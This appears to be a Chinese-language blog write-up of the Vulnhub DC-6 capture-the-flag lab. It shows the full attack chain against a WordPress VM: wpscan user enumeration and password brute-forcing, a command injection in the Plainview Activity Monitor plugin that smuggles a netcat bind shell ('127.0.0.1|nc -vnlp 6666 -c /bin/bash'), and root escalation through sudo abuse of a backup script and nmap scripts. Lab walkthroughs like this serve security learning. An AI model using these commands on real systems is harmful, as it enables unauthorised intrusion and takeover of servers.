Vulnhub-DC-6

這是一個利用wordpress插件漏洞提權的一個靶場,感覺還行叭,前面作者也在題目中給足了思路,要用到rockyou字典,一看是wordpress,思路就是拿到該站點用 wpscan 得到用戶名,然後再用 wpscan 配合字典得到密碼,後面提權視具體情況而定

nmap -sn 192.168.67.99:獲取到目標地址 192.168.67.99
nmap -A -p- 192.168.67.99:獲取到目標地址系統信息及開放端口信息 22 80
既然給了 22 端口那麼極有可能會用到…

瀏覽器查看下http://192.168.67.99發現登陸不上去,頁面會跳轉到http://wordy,於是修改一下到 /etc/hosts 增添一條規則,將 192.168.67.99 解析到 http://wordy
1592901060(1).png
再次打開 http://wordy 查看,這界面一看就是 wordpress 老規矩,wapplayzer 查看一下,是 wordpress 5.1.1 版本[新版本],根據題目提示[剛開始沒有看到提示,直接 cewl 收集了一波,然後 wpscan 查了下用戶名,rockyou 字典有點大…跑起來很費時]

一邊跑下有哪些有戶名,一邊把字典搞過來
wpscan --url http://wordy -e u
cp /usr/share/wordlists/rockyou.txt.gz /root/ --> 解壓,得到 rockyou.txt
cat rockyou.txt | grep k01 > pwd.txt

得到五個用戶名:admin mark graham sarah jens,保存到 name.txt
wpscan 跑密碼: wpscan --url http://wordy -U name.txt -P pwd.txt
得到 mark 的密碼: helpdesk01
嘗試 ssh 登陸,登陸失敗
於是 web 登陸,也沒看到有什麼東西可搞,wordpress 最常爆漏洞的地方就是插件了,那就枚舉一下該站都有哪些插件

wpscan --url http://wordy --plugins-detection aggressive

發現有兩個插件不是最新版本的,看看這兩個插件有無可利用的
searchsploit Plugin Plainview Activity
WordPress Plugin Plainview Activity Monitor 20161228 - (Auth | php/webapps/45274.html
cp /usr/share/exploitdb/exploit/php/webapps/45274.html /root/a.html
vim a.html修改
cp a.html /var/www/html/
service apache2 start
kali這邊:nc 192.168.67.99 9999
1592903183(1).png

訪問 http://192.168.67.221/a.html,點擊 submit request 提交,頁面跳轉,但是沒有反應,提示 connection refused

那就嘗試提交一下
710cd7f88be0f50a35d682c7bd86b49.png
dbcc36e7d57efce87cccbbf8514793b.png
可看到命令正常執行,F12 修改一下max length,把 15 改成 1000,然後輸入
127.0.0.1|nc -vnlp 6666 -c /bin/bash
nc 192.168.67.99 6666 --> kali這邊接shell

成功拿到 shell,加個殼
python -c 'import pty;pty.spawn("/bin/bash")'
cd /home/mark
ls
cd stuff
cat things-to-do.txt

得到 graham 的密碼:
- Add new user: graham - GSo7isUM1D4 - done

ssh 登陸一波:
ssh [email protected]
yes
GSo7isUM1D4

ls --> 沒有東西
sudo -l --> 查看有無過權東西
有:/home/jens/backups.sh

既然該 shell 腳本可以以 jens 權限,那就寫點東西進去,
cat /home/jens/backups.sh
vi /home/jens/backups.sh
#!/bin/bash
/bin/bash
cat /home/jens/backups.sh
cd /home/jens
sudo -u jens ./backups.sh

這就來到了 jens 的環節:
ls
sudo -l:發現有 /usr/bin/nmap
衆所周知 nmap 可以啓用腳本:那執行個系統命令豈不可以拿到 root 權限?
echo 'os.execute("/bin/bash")' > SHELL -->注意引號的使用
sudo /usr/bin/nmap --script SHELL
id
ls /root/
cat /root/the/flag.txt

1592904898(1).png

總結:
1.密碼破解2.漏洞利用3.提權4.細心5.簡單腳本

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章